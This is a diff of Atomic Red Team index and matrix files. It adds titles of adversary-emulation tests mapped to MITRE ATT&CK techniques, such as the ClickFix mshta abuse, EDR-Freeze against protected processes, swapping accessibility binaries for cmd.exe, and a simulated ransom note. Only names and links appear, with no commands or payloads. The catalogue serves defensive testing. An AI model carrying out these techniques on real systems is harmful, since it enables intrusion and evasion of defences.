  - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
  - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
  - Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
+  - Atomic Test #16: Abuse of Linux Magic System Request Key for Reboot [linux]

 # initial-access
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -10,7 +10,9 @@
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
+  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -19,7 +21,7 @@
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
-  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory [macos, linux]
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -49,7 +49,7 @@
  - Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1672 Email Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -69,7 +69,7 @@
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Use Alternate Authentication Material: Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # initial-access
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -29,7 +29,9 @@
 - [T1006 Direct Volume Access](../../T1006/T1006.md)
  - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
+  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.007 Masquerading: Double File Extension](../../T1036.007/T1036.007.md)
  - Atomic Test #1: File Extension Masquerading [windows]
@@ -70,6 +72,7 @@
 - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
  - Atomic Test #2: Masquerade as a built-in system executable [windows]
+  - Atomic Test #3: Masquerading cmd.exe as VEDetector.exe [windows]
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
  - Atomic Test #1: Extract binary files via VBA [windows]
@@ -139,6 +142,7 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
  - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
  - Atomic Test #2: Certutil Rename and Decode [windows]
+  - Atomic Test #11: Expand CAB with expand.exe [windows]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
  - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
@@ -479,6 +483,7 @@
  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -773,6 +778,8 @@
  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
+  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -944,6 +951,7 @@
  - Atomic Test #9: Office Generic Payload Download [windows]
  - Atomic Test #10: LNK Payload Download [windows]
  - Atomic Test #11: Mirror Blast Emulation [windows]
+  - Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
@@ -1239,6 +1247,8 @@
  - Atomic Test #6: Replace utilman.exe (Ease of Access Binary) with cmd.exe [windows]
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
+  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1483,6 +1493,7 @@
  - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
  - Atomic Test #11: Compress a File for Exfiltration using Makecab [windows]
+  - Atomic Test #12: Copy and Compress AppData Folder [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
@@ -2048,6 +2059,7 @@
  - Atomic Test #1: Replace Desktop Wallpaper [windows]
  - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
  - Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
+  - Atomic Test #4: Windows - Display a simulated ransom note via Notepad (non-destructive) [windows]
 - T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
@@ -9,7 +9,7 @@
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -8,7 +8,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -15,7 +15,7 @@
